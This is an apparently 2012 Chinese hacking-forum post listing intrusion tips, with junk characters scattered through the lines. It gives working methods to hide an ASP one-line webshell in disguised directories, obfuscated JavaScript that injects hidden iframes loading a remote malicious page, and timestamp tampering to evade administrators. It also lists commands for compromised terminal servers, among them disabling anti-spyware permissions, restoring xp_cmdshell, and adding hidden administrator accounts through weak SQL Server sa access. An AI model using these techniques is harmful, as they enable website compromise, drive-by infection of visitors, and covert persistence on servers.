53、隐藏ASP后门的两种方法
+ M- p4 H, {3 m2 K3 n1、建立非标准目录:mkdir images..\1 [- W1 H" d8 V+ ?3 J* `% h
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
`) R- W1 S/ ~通过web访问ASP木马:http://ip/images../news.asp?action=login
! u6 P. ^: q6 m4 V0 l' H如何删除非标准目录:rmdir images..\ /s
& z0 z) @; O- N0 O2 f E2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
- r' E% _1 X; |2 o$ L+ mmkdir programme.asp
7 I# T0 Y% m, b! L0 ^! E新建1.txt文件内容:<!--#include file=”12.jpg”-->0 F4 f; n4 d+ q# A/ L2 i; h
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 X1 ~( F/ i) K% H* Fattrib +H +S programme.asp
3 T/ H/ r( O: P; \通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 Q! \* o! e: \0 W' ^2 U7 E C, L5 e( q% p2 U$ s1 {) _, i
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
! O' R% D. P2 r) `然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
$ i# X" j$ x9 O* y" C s
3 Y. Q: ~; |* N( d0 I' }, Z55、JS隐蔽挂马
. G& X% B$ V1 M1.
e; M' M3 J$ G' B: F$ N) nvar tr4c3="<iframe src=ht";" o$ ~1 ?$ u% [- [; N. a! A& ^
tr4c3 = tr4c3+"tp:/";! L4 x$ F# g7 u! s6 ]/ _
tr4c3 = tr4c3+"/ww";; E& z4 e. Z: R2 o7 p& h' m
tr4c3 = tr4c3+"w.tr4";8 m' ?& r9 |; s( k1 ?$ G! M
tr4c3 = tr4c3+"c3.com/inc/m";
6 }3 c" k3 W/ vtr4c3 = tr4c3+"m.htm style="display:none"></i";. y- S5 B2 a; v. {: U/ ]7 l
tr4c3 =tr4c3+"frame>'";
3 f6 j. E9 p5 h7 R- E' k/ ^document.write(tr4c3);! d4 Q: f. ^4 U0 \
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。8 b J6 I- o5 ?% U% D0 d
7 F8 @! ~( K$ L5 v9 U0 t: I2.
' V/ W! s- L: |转换进制,然后用EVAL执行。如
1 `. Q% {6 M! q3 U0 u, A8 T+ ^eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; z/ f. B( m& \1 d7 V- }5 l
不过这个有点显眼。& k& k* k1 n7 y% t2 L# A# P+ C
3.
) `' c7 N8 V4 M7 n& P Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');& N; o! {) H; y' a P/ l6 P
最后一点,别忘了把文件的时间也修改下。% ~( v( ]' W% h" B, ]
! F3 y3 X3 H/ w6 Q' ^% Z6 c* p
56.3389终端入侵常用DOS命令
; N4 R! m* J$ r2 {) D- p9 c. Ctaskkill taskkill /PID 1248 /t( t( Z! A( W& q* y
2 t4 o4 y9 U( W! s }1 ]0 Ytasklist 查进程
3 m) d4 }8 D0 R# b+ E4 c3 }; A8 M% r7 c+ s! G) V7 @/ s
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 u( O" V+ E; t4 q( l2 Yiisreset /reboot1 L I3 ^( s; W
tsshutdn /reboot /delay:1 重起服务器& o) c8 w( x4 M7 ^* Q9 `, E
9 V1 N5 u4 z1 {+ _; F' V2 s ?
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,) \4 t, w: o6 z
+ |" I9 c+ K6 o* P& v# a, H
query user 查看当前终端用户在线情况- B- m; g% \" B& l$ r" @# C& F
+ _2 r$ v8 C( C" w7 H# R) e0 [要显示有关所有会话使用的进程的信息,请键入:query process *0 e$ V# R' Y3 E1 p) }/ F! G
X* v$ V! k. Y4 V! s N
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
( Z7 {% k' M" {7 n' Y) p X, w; X; x4 {$ J: t1 R/ ]
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER25 }8 U6 e1 u" W2 y S8 h. l9 U
^/ N) @+ N& [
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 n& L, @- v5 K$ l! X* ?, M5 T* ?' P& B+ C# Y5 \% D6 t; d
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 [. R7 Y6 G1 F7 Y1 U
+ y2 G* w. _) W+ w+ l3 Q; h0 h
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
" X, `0 V6 y3 O3 L
# u( m4 u6 ^. v7 e* F命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
/ o) Z: q+ y5 B, L8 t& |; l* A& ?( x" _' q6 V0 z5 |7 z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机% @% b! Q; ?, P7 b) `7 o
: j/ H3 K' D' s9 T7 N0 M3 I& [56、在地址栏或按Ctrl+O,输入:, N. r- g, U- t) _# H
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;, F! V* e. C' y% j
4 D3 {8 A# P( k& Q6 u& v
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。 ]) T* t( o! N+ H( f* J, d* y
`1 B# ` K# D1 z/ u57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
& {6 S# c* E3 ]. V* W$ ^* u用net localgroup administrators是可以看到管理组下,加了$的用户的。- y, O) I' G) N1 q0 W
6 {, c3 i' ^! F0 k
58、 sa弱口令相关命令
5 i' o$ j# J" K {2 @0 |4 ~5 t6 e# [ Z! {5 t$ ]3 L
一.更改sa口令方法: \7 J' E* ]3 {3 Z* i0 i
用sql综合利用工具连接后,执行命令:
2 [9 Y8 O4 i+ ]: Cexec sp_password NULL,'20001001','sa'
# X2 \) ~6 @6 O1 e(提示:慎用!)
0 L# _6 m _9 Y7 u6 g3 L4 U5 i
r. Y" m$ }% A二.简单修补sa弱口令. |0 P( i& X1 m- f# G
$ D4 _* D3 o5 Q9 p e b
方法1:查询分离器连接后执行:% R- N W* b1 F) ?# f/ D+ U
if exists (select * from/ _3 H8 i/ o( @. \" z0 a; s. q
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% f3 e' u: @' |$ F. ?, [% HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)0 E9 X& d7 Q& T/ a2 Q1 d" E
7 C, v! V0 a& y, C
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'0 ]4 W0 Q3 Q- K. |5 p. y
' T. f. @7 z7 g+ l% o' J: p
GO4 s3 J: c) b2 W
0 | Q; p- b" V% T
然后按F5键命令执行完毕0 `# W* ^- S6 d: n) |. v
6 {$ l" G% m" e6 G7 I* f方法2:查询分离器连接后
7 m1 e# J. b4 o% p; p/ I第一步执行:use master
7 \8 e0 a% d1 J. Z7 W1 U第二步执行:sp_dropextendedproc 'xp_cmdshell'
/ P) k* Y$ @' L' z7 c3 t然后按F5键命令执行完毕: W' }4 Q- r; V) R+ F5 _
. J. k3 t3 W* Q6 }8 v, Z9 d
% g* K- v* ~7 I; N( e5 ]三.常见情况恢复执行xp_cmdshell.: ~4 [* t; X) e0 s3 ~7 ~
" y0 ?/ W4 o" W# a) ]3 }
2 }5 A. j% g7 G+ t1 未能找到存储过程'master..xpcmdshell'.
3 P/ H3 z$ S @% d; Y. o1 O 恢复方法:查询分离器连接后,
% W; U5 p. B! o- S: b第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
' Y2 o) |3 ?$ M" f3 w. _6 t! C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; ~. M) ?3 F v3 v9 h, l
然后按F5键命令执行完毕
& _8 v* n3 e( [! z* u/ U1 c
. `8 c& r! K5 O2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 d" M6 C4 \4 t& R/ Q
恢复方法:查询分离器连接后,
3 E0 u0 @8 f: s第一步执行:sp_dropextendedproc "xp_cmdshell"5 |2 d& `+ C. t) X" f8 I- o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- @/ D2 k' W% u% J! u6 _
然后按F5键命令执行完毕
' M% B( t) F0 Q# q9 N8 k% l. K( m& c6 h' ?) W+ f6 L
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): w5 B! Z! d& \' A# d- v5 R H
恢复方法:查询分离器连接后,; t2 N8 L$ |! e
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
Q4 H5 H! h; r! h5 _第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' . z+ U" d/ V7 n, X+ B
然后按F5键命令执行完毕$ {9 C. e7 K, Z4 g
) ~2 i! n7 J& _
四.终极方法.
7 X, K# |) I0 e/ G如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
' y4 t% H9 u; r% H- c+ }7 Z查询分离器连接后,
: X$ G3 v) V4 U, l* ?4 m2000servser系统:: `0 h( t* a1 f- H6 @6 [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
+ G/ K6 A+ G2 A6 [) S9 h$ G( w0 w7 B& i( E# r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
I' s! V7 j) s. ^
$ o7 L- [9 h4 \8 V F+ w' z6 }* ^xp或2003server系统:
+ @7 X2 `, } Z8 }. }! i+ c5 y1 d. F$ H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'# ]" _0 T" V8 l+ u. k7 b
, N: b4 A" I, |) X7 Y bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 L9 f7 v4 P+ Q9 D1 `. d+ \
|
发表于 2012-9-15 14:13:15
收藏
支持
反对